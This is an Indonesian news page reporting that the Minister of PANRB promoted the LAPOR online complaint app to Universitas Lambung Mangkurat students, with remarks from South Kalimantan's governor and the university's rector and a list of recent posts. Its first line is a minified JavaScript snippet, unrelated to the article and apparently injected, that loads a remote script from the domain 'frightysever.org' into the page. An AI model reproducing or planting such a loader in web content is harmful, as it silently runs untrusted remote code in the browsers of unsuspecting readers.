(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Pemerintahan

Menpan RB Membidik Mahasiswa ULM Jadi Influencer Aplikasi LAPOR


BANJARBARU, Menteri Pendayagunaan Aparatur Negara dan Reformasi Birokrasi (PANRB) Syafruddin menggelorakan aplikasi mobile bertajuk “LAPOR” (Layanan Aspirasi dan Pengaduan Online Rakyat) ke seluruh elemen masyarakat. Salah satu yang menjadi sasarannya yakni para kaum milenial.

Seperti saat kunjungannya ke Kalsel, Menpan RB secara langsung menyebarluaskan informasi aplikasi ini di hadapan ribuan mahasiswa Universitas Lambung Mangkurat (ULM) di auditorium ULM kampus Banjarbaru, Kamis (19/9) siang.

Kegiatan yang diberi nama “LAPOR! Goes to Campus” ini dihadiri lGubernur Kalsel H Sahbirin Noor, Rektor ULM Banjarmasin Prof Sutarto Hardi serta Bupati dan Walikota se-Kalsel.

Menpan RB Syafurddin mengatakan, ada tiga universitas di Indonesia yang terpilih untuk dikunjungi yakni Universitas Diponegoro, Universitas Lambung Mangkurat (ULM), dan Universitas Sriwijaya.

Mantan Wakapolri ini menjelaskan, kegiatan Goes To Campus merupakan program khusus Kemenpan RB memperkenalkan aplikasi LAPOR ke kalangan pemuda atau yang saat ini dikenal dengan kaum milenial.

“Mengapa kaum milenial, ya karena kita ingin  generasi bangsa dapat menjadi influencer (pengaruh). Untuk itulah sasaran kita di kampus, sebab ULM mempunyai 30 ribu mahasiswa. Bayangkan 30 ribu mahasiswa menjadi influencer bagi 4 juta jiwa orang di Kalsel,” katanya.

Aplikasi LAPOR, menurut Syafruddin, bertujuan untuk membangun partisipasi publik. Hal ini pula yang diharapkan dapat membuat jarak antar pemerintahan dan publik akan semakin dekat.

“Kalau jauh jaraknya dengan publik, pemerintah sendiri akan sulit berhasil dalam mengatur tata kelola era pemerintahan ini. Apalagi saat ini revolusi digital. Sangat mudah melakukan komunikasi dan salah satunya melalui aplikasi LAPOR,” lanjutnya.

Tercatat, sudah ada 100 ribu lebih laporan yang diterima Kemenpan RB melalui aplikasi LAPOR. Sekitar 50 persennya telah berhasil ditindak lanjuti. Sedangkan yang belum, karena laporannya di luar konteks.

Melihat kondisi tersebut, Menpan RB meyakini keberhasilan aplikasi LAPOR cukup memadai. Meskipun banyaknya laporan yang diterima Kemenpan RB, rupanya juga ada penyaluran apresiasi dari masyarakat.

“Ada juga apresiasi. Pemerintah kita ini kan tidak buruk-buruk banget, sekarang juga sudah bagus. Khusus untuk Pemprov Kalsel misalnya dalam sistem akuntabilitas atau trasnparansi mendapat nilai A. Satu-satunya di luar Pulau Jawa,” pungkasnya.

Sementara itu, Gubernur Kalsel, H Sahbirin Noor berharap aplikasi LAPOR dapat lebih dikonektivitaskan dan semakin dekat dengan masyarakat. Dirinya mengimbau seluruh jajaran pemerintahan provinsi Kalsel serta kabupaten/kota terus bergerak dan berupaya dekat dengan masyarakat.

“Sebab, dengan begitu akan terjadi komunikasi dan segala sesuatu dapat dibicarakan baik itu masukan, kritikan, tanggapan, dan apa saja. Partisipasi dari masyarakat Kalsel ini luar biasa. Terbukti kita berhasil mendapat nilai A dalam Sistem Akuntabilitas Kinerja Instansi Pemerintah,” kata Gubernur yang akrab disapa Paman Birin tersebut.

Di sisi lain, Rektor ULM Banjarmasin Prof Sutarto Hadi menyambut baik dengan launching aplikasi LAPOR di universitas yang dipimpinnya. Menurutnya, untuk mengoptimalkan aplikasi layanan masyarakat itu, seluruh lembaga pelayanan publik di Kalsel perlu lebih aktif dalam berkomunikasi serta bersentuhan dengan masyarakat. Juga lembaga pendidikan dan universitas yang harus bersikap inklusif.

Dijelaskannya dengan adanya aplikasi LAPOR, membuat komunikasi mahasiswa dengan para dosen pun akan lebih terbuka.

“Dengan aplikasi ini mahasiswa bisa melaporkan sesuatu tanpa harus takut menyebutkan namanya. Laporan itu langsung tekirim ke Kementerian Riset, Teknologi, dan Pendidikan Tinggi Republik Indonesia. Dari kementrian akan melaporakannya ke Kampus untuk ditindak lanjuti,” tungkasnya. (rico)

Reporter : Rico
Editor : Bie


Desy Arfianty

Recent Posts

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

2 menit ago

Embarkasi Haji Banjarmasin Berangkatkan Kloter 1, 320 Jemaah Menuju Madinah

KANALKALIMANTAN.COM, BANJARBARU - Jemaah haji Kloter pertama diberangkatkan dari Asrama Haji Embarkasi Banjarmasin di Banjarbaru,… Read More

30 menit ago

Dilakban di Paha, Empat Orang di Bandara Juwata Tarakan Selundupkan 4 Kg Sabu

KANALKALIMANTAN.COM, TARAKAN - Empat orang calon penumpang pesawat dengan rute Tarakan-Makassar batal berangkat lantaran kedapatan… Read More

15 jam ago

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

16 jam ago

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

19 jam ago

Embarkasi Banjarmasin Berangkatkan 5.759 JCH Kalsel-Kalteng, Pelayanan Penuh Jemaah Lansia

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 4.071 jemaah calon haji (JCH) asal Kalimantan Selatan (Kalsel) akan berangkat… Read More

20 jam ago

This website uses cookies.